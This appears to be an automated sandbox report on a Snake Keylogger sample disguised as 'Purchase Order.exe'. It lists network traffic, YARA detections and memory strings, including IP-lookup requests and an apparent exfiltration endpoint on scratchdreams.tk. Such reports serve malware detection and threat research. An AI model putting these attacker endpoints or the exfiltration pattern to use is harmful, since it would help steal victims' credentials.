Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49710 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: checkip.dyndns.org

Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://scratchdreams.tk
Source: Purchase Order.exe, 00000003.00000002.4454181362.00000000030C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F55000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F48000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/102.129.152.231$
Source: Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: Purchase Order.exe, 00000003.00000002.4454181362.0000000002F9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.5:49724 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.399bcb8.9.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.397b498.8.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.397b498.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Purchase Order.exe.399bcb8.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order.exe PID: 1480, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Purchase Order.exe PID: 6336, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_0094D604	0_2_0094D604
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C254F8	0_2_06C254F8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C27F98	0_2_06C27F98
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C217E8	0_2_06C217E8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C23700	0_2_06C23700
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C213B0	0_2_06C213B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C22058	0_2_06C22058
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C21C10	0_2_06C21C10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 0_2_06C21C20	0_2_06C21C20
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DC4D0	3_2_052DC4D0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DC7B2	3_2_052DC7B2
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052D6168	3_2_052D6168
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DC1F0	3_2_052DC1F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DB388	3_2_052DB388
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DEDF0	3_2_052DEDF0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DBC32	3_2_052DBC32
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DBF10	3_2_052DBF10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052D98B8	3_2_052D98B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052D68E0	3_2_052D68E0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052D4B31	3_2_052D4B31
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DFA10	3_2_052DFA10
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DCA92	3_2_052DCA92
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DB552	3_2_052DB552
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052D35CA	3_2_052D35CA
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052D21B4	3_2_052D21B4
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DE300	3_2_052DE300
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_052DE310	3_2_052DE310
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2B6E8	3_2_06B2B6E8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B28608	3_2_06B28608
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2D670	3_2_06B2D670
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2AA58	3_2_06B2AA58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2C388	3_2_06B2C388
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B28BF2	3_2_06B28BF2
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2B0A0	3_2_06B2B0A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2D028	3_2_06B2D028
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2A408	3_2_06B2A408
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B211A0	3_2_06B211A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2C9D8	3_2_06B2C9D8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2BD38	3_2_06B2BD38
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B25EB8	3_2_06B25EB8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2F2A0	3_2_06B2F2A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2F29B	3_2_06B2F29B
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2B6D8	3_2_06B2B6D8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B25EC8	3_2_06B25EC8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B25618	3_2_06B25618
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2560A	3_2_06B2560A
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B25A70	3_2_06B25A70
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2D662	3_2_06B2D662
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B25A60	3_2_06B25A60
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2AA48	3_2_06B2AA48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B233B8	3_2_06B233B8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B233A8	3_2_06B233A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2A3FA	3_2_06B2A3FA
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B26BD0	3_2_06B26BD0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B26BC1	3_2_06B26BC1
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B23730	3_2_06B23730
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B26320	3_2_06B26320
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B23720	3_2_06B23720
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B26312	3_2_06B26312
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B26778	3_2_06B26778
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2C378	3_2_06B2C378
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2676A	3_2_06B2676A
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B274A8	3_2_06B274A8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2B090	3_2_06B2B090
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B27497	3_2_06B27497
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B20498	3_2_06B20498
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B20488	3_2_06B20488
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B208F0	3_2_06B208F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B278F0	3_2_06B278F0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B208E0	3_2_06B208E0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B24430	3_2_06B24430
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B22818	3_2_06B22818
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2D018	3_2_06B2D018
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B20006	3_2_06B20006
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B22807	3_2_06B22807
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B27050	3_2_06B27050
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B20040	3_2_06B20040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B27040	3_2_06B27040
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B281B0	3_2_06B281B0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B281A0	3_2_06B281A0
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B25198	3_2_06B25198
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2518A	3_2_06B2518A
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B285F8	3_2_06B285F8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2C9C8	3_2_06B2C9C8
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B2BD33	3_2_06B2BD33
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B20D39	3_2_06B20D39
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B27900	3_2_06B27900
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B27D58	3_2_06B27D58
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B20D48	3_2_06B20D48
Source: C:\Users\user\Desktop\Purchase Order.exe	Code function: 3_2_06B27D48	3_2_06B27D48

Source: Purchase Order.exe, 00000000.00000000.1967794908.00000000002F8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLkSW.exe: vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2029311830.00000000038AE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2027914720.000000000095E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2028164287.0000000000A07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLkSW.exe: vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2031445483.0000000006A00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order.exe
Source: Purchase Order.exe, 00000000.00000002.2028960914.000000000272B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.4450752674.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
Source: Purchase Order.exe, 00000003.00000002.4450334968.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs Purchase Order.exe
Source: Purchase Order.exe	Binary or memory string: OriginalFilenameLkSW.exe: vs Purchase Order.exe

Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe	Section loaded: rtutils.dll	Jump to behavior
